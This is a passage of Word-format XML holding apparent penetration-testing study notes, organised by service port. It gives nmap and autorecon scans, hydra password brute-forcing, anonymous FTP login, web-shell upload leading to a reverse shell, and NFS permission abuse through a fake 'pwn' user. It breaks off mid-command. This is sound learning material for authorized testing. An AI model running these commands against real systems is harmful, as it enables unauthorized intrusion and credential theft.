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825625" w14:textId="4EBAB128" w:rsidR="0061112E" w:rsidRPr="00915E3B" w:rsidRDefault="002E4531" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ENUMERATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7718A680" w14:textId="38EACF0E" w:rsidR="00EF189B" w:rsidRDefault="00EF189B">
      <w:r>
        <w:tab/>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p- -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E435F3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E435F3">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D10B1" w14:textId="59C81B92" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:tab/>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r w:rsidR="00E435F3">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E435F3">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF189B">
        <w:t xml:space="preserve"> INTERESTING PORTS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -o filename -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E79E67" w14:textId="6A956509" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:t>Then try top UDP ports for hidden gems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB8415" w14:textId="5EA384C7" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:tab/>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –top-ports 20 -o filename -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31B177" w14:textId="426C1571" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11">
      <w:r>
        <w:t>Full scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229B5DD" w14:textId="26BF4116" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11" w:rsidP="00DE1C11">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t>autorecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t xml:space="preserve"> -pT:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t>80,T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t>:443</w:t>
      </w:r>
      <w:r>
        <w:t>,U:999</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1C11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1C11">
        <w:t xml:space="preserve"> -v --exclude-tags </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE1C11">
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12309DF8" w14:textId="734CDA89" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11" w:rsidP="00DE1C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exclude </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and do manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66689F72" w14:textId="6EF3952F" w:rsidR="00DE1C11" w:rsidRDefault="00DE1C11" w:rsidP="00DE1C11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24084F3D" w14:textId="5DD75489" w:rsidR="0061112E" w:rsidRPr="00915E3B" w:rsidRDefault="0061112E" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP (21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE1166" w14:textId="2748269E" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:t>Check for an anonymous login and check to see if the specific FTP server has known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B203E00" w14:textId="1C161A70" w:rsidR="000F13BF" w:rsidRPr="005570D7" w:rsidRDefault="003975A9" w:rsidP="000F13BF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>ftp IP (user: anonymous, pass: blank)</w:t>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:tab/>
        <w:t>passive</w:t>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:tab/>
        <w:t>binary</w:t>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000F13BF">
        <w:tab/>
        <w:t>put file/get file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170103BF" w14:textId="6E8AE6F4" w:rsidR="000F13BF" w:rsidRDefault="000F13BF" w:rsidP="000F13BF">
      <w:r>
        <w:t>If uploaded web shell (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> work</w:t>
      </w:r>
      <w:r w:rsidR="00034E76">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> best), access it through the correct port in browser. Then get proper reverse shell (try </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bash first). Otherwise, see if can execute nc.exe</w:t>
      </w:r>
      <w:r w:rsidR="00CA7D91">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA7D91">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA7D91">
        <w:t xml:space="preserve"> .exe</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7482BB68" w14:textId="43E4AA42" w:rsidR="005570D7" w:rsidRDefault="005570D7" w:rsidP="006E31FF">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:r w:rsidR="00034E76">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">L </w:t>
      </w:r>
      <w:r w:rsidR="00795EB5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>~/Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E31FF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="006E31FF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Usernames/top-usernames-shortlist.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P </w:t>
      </w:r>
      <w:r w:rsidR="00795EB5">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>~/Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/wordlists/</w:t>
      </w:r>
      <w:r w:rsidR="00FF5BEE">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rockyou.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>txt 192.168.13.236 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F508FC" w14:textId="41E7CBD0" w:rsidR="0061112E" w:rsidRPr="00915E3B" w:rsidRDefault="0061112E" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH (22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50086252" w14:textId="2D83E7A4" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:t>Good place to try credentials. If I just know usernames, try hydra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A3EDE" w14:textId="4E71DEA8" w:rsidR="0061112E" w:rsidRDefault="0061112E">
      <w:r>
        <w:tab/>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r w:rsidR="00DB16BD">
        <w:t xml:space="preserve"> -t 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l $USERNAME -P </w:t>
      </w:r>
      <w:r w:rsidR="006E31FF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E31FF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E31FF">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="006E31FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C0DCF">
        <w:t>ssh://$RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B1184" w14:textId="3D8BA5AC" w:rsidR="008C0DCF" w:rsidRPr="00915E3B" w:rsidRDefault="008C0DCF" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMTP (25/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F7B541" w14:textId="0C1DCB4B" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:t>Can try to enumerate usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CB56A" w14:textId="3F788562" w:rsidR="00F977B4" w:rsidRDefault="00F977B4">
      <w:r>
        <w:t xml:space="preserve">Look for exploits (may need to change mail from and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E679F" w14:textId="2DA87F25" w:rsidR="008C0DCF" w:rsidRPr="00915E3B" w:rsidRDefault="008C0DCF" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS (53/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34226BA9" w14:textId="43D4B61E" w:rsidR="008C0DCF" w:rsidRDefault="00697558">
      <w:r>
        <w:t xml:space="preserve">Enumerate with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dnsenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dnsrecon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC12966" w14:textId="4F0678EE" w:rsidR="008C0DCF" w:rsidRPr="00915E3B" w:rsidRDefault="008C0DCF" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPC/NFS (111/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A2764" w14:textId="258AE51D" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:t xml:space="preserve">Enumerate RPC with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C8459F8" w14:textId="12572251" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:tab/>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p 111 –script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rpcinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> $RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC3E17" w14:textId="5CE0BB8A" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:t xml:space="preserve">If I find NFS-related services, enumerate them with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="348792FF" w14:textId="23B5C62F" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Nmap -p 111 –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>* $RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80CFEB" w14:textId="0763A9F2" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:t>If I find NFS shares, I would mount them and see if I can read/write files or change my permissions by adding a new user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B5A5F" w14:textId="656C6CFC" w:rsidR="008C0DCF" w:rsidRDefault="008C0DCF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Mount -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="006E31FF">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $RHOST:</w:t>
      </w:r>
      <w:r w:rsidR="00B43F00">
        <w:t>/SHARENAME /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B43F00">
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47071965" w14:textId="3A6A8ECD" w:rsidR="00B43F00" w:rsidRDefault="00B43F00">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Groupadd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1337 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24F5246B" w14:textId="68210128" w:rsidR="00B43F00" w:rsidRDefault="00B43F00">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1337 -g </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F19C768" w14:textId="315F8E54" w:rsidR="00B43F00" w:rsidRPr="00915E3B" w:rsidRDefault="00B43F00" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB (139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C2245" w14:textId="2E3B80B7" w:rsidR="002336CD" w:rsidRDefault="007E3E88">
      <w:r>
        <w:t>Connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CBFAB1" w14:textId="4A23541B" w:rsidR="002336CD" w:rsidRDefault="00622BE2">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034E76">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>mbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> //IP/</w:t>
      </w:r>
      <w:r w:rsidR="002336CD">
        <w:t>SHARE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -U user</w:t>
      </w:r>
      <w:r w:rsidR="002336CD">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002336CD">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002336CD">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002336CD">
        <w:t xml:space="preserve"> –no-pass -L //IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D626394" w14:textId="23ED8E61" w:rsidR="002336CD" w:rsidRDefault="002336CD">
      <w:r>
        <w:t>Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BDE53" w14:textId="7A5E0C9F" w:rsidR="002336CD" w:rsidRDefault="002336CD">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002336CD">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002336CD">
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002336CD">
        <w:t>smb-enum-domains.nse,smb-enum-groups.nse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002336CD">
        <w:t>,smb-enum-processes.nse,smb-enum-services.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse -p</w:t>
      </w:r>
      <w:r>
        <w:t>139,</w:t>
      </w:r>
      <w:r w:rsidRPr="002336CD">
        <w:t>445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05172567" w14:textId="42D65D44" w:rsidR="00133001" w:rsidRDefault="00133001" w:rsidP="00133001">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If write access to a share, probable exploit: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CABE528" w14:textId="5BD62B5E" w:rsidR="00FD44E6" w:rsidRDefault="00FD44E6">
      <w:r>
        <w:t>enum4linux -a IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB0970" w14:textId="320FFF27" w:rsidR="002336CD" w:rsidRDefault="002336CD">
      <w:r>
        <w:t>Vuln scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC3EC1" w14:textId="1D873ABA" w:rsidR="002336CD" w:rsidRPr="00034E76" w:rsidRDefault="002336CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="323232"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="323232"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
